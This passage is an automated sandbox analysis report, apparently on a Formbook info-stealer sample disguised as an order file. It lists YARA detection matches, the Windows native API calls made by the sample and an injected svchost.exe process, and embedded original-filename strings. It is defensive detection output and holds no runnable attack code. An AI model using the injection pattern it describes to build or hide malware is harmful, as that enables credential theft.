          Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Order 275594 04-D4E5A.exe
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_00AA01A4 NtQueryInformationProcess,0_2_00AA01A4
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_00AA017E NtQueryInformationProcess,0_2_00AA017E
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_00AA3449 NtQueryInformationProcess,0_2_00AA3449
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00419D60 NtCreateFile,17_2_00419D60
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00419E10 NtReadFile,17_2_00419E10
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00419E90 NtClose,17_2_00419E90
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00419F40 NtAllocateVirtualMemory,17_2_00419F40
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00419D5A NtCreateFile,17_2_00419D5A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00419DB2 NtCreateFile,17_2_00419DB2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00419E0A NtReadFile,17_2_00419E0A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00419E8B NtClose,17_2_00419E8B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00419F3C NtAllocateVirtualMemory,17_2_00419F3C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B99A0 NtCreateSection,LdrInitializeThunk,17_2_019B99A0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_019B9910
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B98F0 NtReadVirtualMemory,LdrInitializeThunk,17_2_019B98F0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9840 NtDelayExecution,LdrInitializeThunk,17_2_019B9840
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9860 NtQuerySystemInformation,LdrInitializeThunk,17_2_019B9860
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9A00 NtProtectVirtualMemory,LdrInitializeThunk,17_2_019B9A00
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9A20 NtResumeThread,LdrInitializeThunk,17_2_019B9A20
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9A50 NtCreateFile,LdrInitializeThunk,17_2_019B9A50
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B95D0 NtClose,LdrInitializeThunk,17_2_019B95D0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9540 NtReadFile,LdrInitializeThunk,17_2_019B9540
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9780 NtMapViewOfSection,LdrInitializeThunk,17_2_019B9780
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B97A0 NtUnmapViewOfSection,LdrInitializeThunk,17_2_019B97A0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9710 NtQueryInformationToken,LdrInitializeThunk,17_2_019B9710
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B96E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_019B96E0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_019B9660
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B99D0 NtCreateProcessEx,17_2_019B99D0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9950 NtQueueApcThread,17_2_019B9950
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B98A0 NtWriteVirtualMemory,17_2_019B98A0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9820 NtEnumerateKey,17_2_019B9820
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019BB040 NtSuspendThread,17_2_019BB040
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019BA3B0 NtGetContextThread,17_2_019BA3B0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9B00 NtSetValueKey,17_2_019B9B00
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9A80 NtOpenDirectoryObject,17_2_019B9A80
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9A10 NtQuerySection,17_2_019B9A10
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B95F0 NtQueryInformationFile,17_2_019B95F0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019BAD30 NtSetContextThread,17_2_019BAD30
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9520 NtWaitForSingleObject,17_2_019B9520
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9560 NtWriteFile,17_2_019B9560
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9FE0 NtCreateMutant,17_2_019B9FE0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019BA710 NtOpenProcessToken,17_2_019BA710
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9730 NtQueryVirtualMemory,17_2_019B9730
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019BA770 NtOpenThread,17_2_019BA770
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9770 NtSetInformationFile,17_2_019B9770
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9760 NtOpenProcess,17_2_019B9760
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B96D0 NtCreateKey,17_2_019B96D0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9610 NtEnumerateValueKey,17_2_019B9610
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9650 NtQueryValueKey,17_2_019B9650
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B9670 NtQueryInformationProcess,17_2_019B9670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9A50 NtCreateFile,LdrInitializeThunk,23_2_031A9A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,23_2_031A9910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A99A0 NtCreateSection,LdrInitializeThunk,23_2_031A99A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9840 NtDelayExecution,LdrInitializeThunk,23_2_031A9840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9860 NtQuerySystemInformation,LdrInitializeThunk,23_2_031A9860
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9710 NtQueryInformationToken,LdrInitializeThunk,23_2_031A9710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9780 NtMapViewOfSection,LdrInitializeThunk,23_2_031A9780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9FE0 NtCreateMutant,LdrInitializeThunk,23_2_031A9FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9650 NtQueryValueKey,LdrInitializeThunk,23_2_031A9650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9660 NtAllocateVirtualMemory,LdrInitializeThunk,23_2_031A9660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A96D0 NtCreateKey,LdrInitializeThunk,23_2_031A96D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A96E0 NtFreeVirtualMemory,LdrInitializeThunk,23_2_031A96E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9540 NtReadFile,LdrInitializeThunk,23_2_031A9540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A95D0 NtClose,LdrInitializeThunk,23_2_031A95D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9B00 NtSetValueKey,23_2_031A9B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031AA3B0 NtGetContextThread,23_2_031AA3B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9A10 NtQuerySection,23_2_031A9A10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9A00 NtProtectVirtualMemory,23_2_031A9A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9A20 NtResumeThread,23_2_031A9A20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9A80 NtOpenDirectoryObject,23_2_031A9A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9950 NtQueueApcThread,23_2_031A9950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A99D0 NtCreateProcessEx,23_2_031A99D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9820 NtEnumerateKey,23_2_031A9820
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031AB040 NtSuspendThread,23_2_031AB040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A98A0 NtWriteVirtualMemory,23_2_031A98A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A98F0 NtReadVirtualMemory,23_2_031A98F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031AA710 NtOpenProcessToken,23_2_031AA710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9730 NtQueryVirtualMemory,23_2_031A9730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031AA770 NtOpenThread,23_2_031AA770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9770 NtSetInformationFile,23_2_031A9770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9760 NtOpenProcess,23_2_031A9760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A97A0 NtUnmapViewOfSection,23_2_031A97A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9610 NtEnumerateValueKey,23_2_031A9610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9670 NtQueryInformationProcess,23_2_031A9670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031AAD30 NtSetContextThread,23_2_031AAD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9520 NtWaitForSingleObject,23_2_031A9520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A9560 NtWriteFile,23_2_031A9560
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031A95F0 NtQueryInformationFile,23_2_031A95F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00369D60 NtCreateFile,23_2_00369D60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00369E10 NtReadFile,23_2_00369E10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00369E90 NtClose,23_2_00369E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00369F40 NtAllocateVirtualMemory,23_2_00369F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00369D5A NtCreateFile,23_2_00369D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00369DB2 NtCreateFile,23_2_00369DB2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00369E0A NtReadFile,23_2_00369E0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00369E8B NtClose,23_2_00369E8B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00369F3C NtAllocateVirtualMemory,23_2_00369F3C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_00AA32180_2_00AA3218
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_00AA37A20_2_00AA37A2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_00AA2D780_2_00AA2D78
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_00AA04800_2_00AA0480
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_00AA04700_2_00AA0470
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_00AA37C40_2_00AA37C4
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_044632120_2_04463212
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_04460B800_2_04460B80
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_04460E890_2_04460E89
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_04460E980_2_04460E98
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_044600400_2_04460040
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_044608500_2_04460850
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_044608600_2_04460860
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_044600060_2_04460006
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_044633690_2_04463369
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_04460B760_2_04460B76
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 0_2_04465BC50_2_04465BC5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0040103017_2_00401030
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0041D97C17_2_0041D97C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0041E1FC17_2_0041E1FC
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0041D34617_2_0041D346
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00402D8717_2_00402D87
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00402D9017_2_00402D90
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00409E4017_2_00409E40
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00409E3B17_2_00409E3B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0041D6A717_2_0041D6A7
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0041E7AF17_2_0041E7AF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_00402FB017_2_00402FB0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF17_2_019999BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197F90017_2_0197F900
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199412017_2_01994120
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198B09017_2_0198B090
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A420A817_2_01A420A8
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A20A017_2_019A20A0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A428EC17_2_01A428EC
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A4E82417_2_01A4E824
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3100217_2_01A31002
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A83017_2_0199A830
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AEBB017_2_019AEBB0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A223E317_2_01A223E3
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AABD817_2_019AABD8
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3DBD217_2_01A3DBD2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A303DA17_2_01A303DA
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A42B2817_2_01A42B28
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A30917_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199AB4017_2_0199AB40
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A422AE17_2_01A422AE
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A2FA2B17_2_01A2FA2B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A258117_2_019A2581
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32D8217_2_01A32D82
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198D5E017_2_0198D5E0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A425DD17_2_01A425DD
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A42D0717_2_01A42D07
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01970D2017_2_01970D20
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A41D5517_2_01A41D55
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3449617_2_01A34496
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198841F17_2_0198841F
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3D46617_2_01A3D466
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A41FF117_2_01A41FF1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A4DFCE17_2_01A4DFCE
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A42EF717_2_01A42EF7
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01996E3017_2_01996E30
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3D61617_2_01A3D616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03232B2823_2_03232B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A30923_2_0318A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318AB4023_2_0318AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0320CB4F23_2_0320CB4F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319138B23_2_0319138B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319EBB023_2_0319EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319ABD823_2_0319ABD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_032123E323_2_032123E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0322DBD223_2_0322DBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_032203DA23_2_032203DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0321FA2B23_2_0321FA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_032322AE23_2_032322AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03224AEF23_2_03224AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0316F90023_2_0316F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318412023_2_03184120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031899BF23_2_031899BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0323E82423_2_0323E824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0322100223_2_03221002
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318A83023_2_0318A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0317B09023_2_0317B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_032320A823_2_032320A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_031920A023_2_031920A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_032328EC23_2_032328EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03231FF123_2_03231FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0323DFCE23_2_0323DFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03186E3023_2_03186E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0322D61623_2_0322D616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03232EF723_2_03232EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03232D0723_2_03232D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03160D2023_2_03160D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03231D5523_2_03231D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0319258123_2_03192581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_03222D8223_2_03222D82
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0317D5E023_2_0317D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_032325DD23_2_032325DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0317841F23_2_0317841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0322D46623_2_0322D466
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0318B47723_2_0318B477
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0322449623_2_03224496
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0036E1FC23_2_0036E1FC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00352D9023_2_00352D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00352D8723_2_00352D87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00359E3B23_2_00359E3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00359E4023_2_00359E40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00352FB023_2_00352FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_0036E7AF23_2_0036E7AF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: String function: 0197B150 appears 133 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0316B150 appears 136 times
          Source: Order 275594 04-D4E5A.exeBinary or memory string: OriginalFilename vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304577458.0000000002878000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWindowsNetwork.dll> vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000000.198736088.0000000000012000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEhBr.exe: vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.312462947.00000000070B0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.312764855.0000000007230000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.312764855.0000000007230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.312344309.0000000006E90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.312695039.00000000071D0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exeBinary or memory string: OriginalFilename vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000011.00000000.299621636.0000000000E02000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEhBr.exe: vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000011.00000002.363040639.0000000001A6F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exeBinary or memory string: OriginalFilenameEhBr.exe: vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
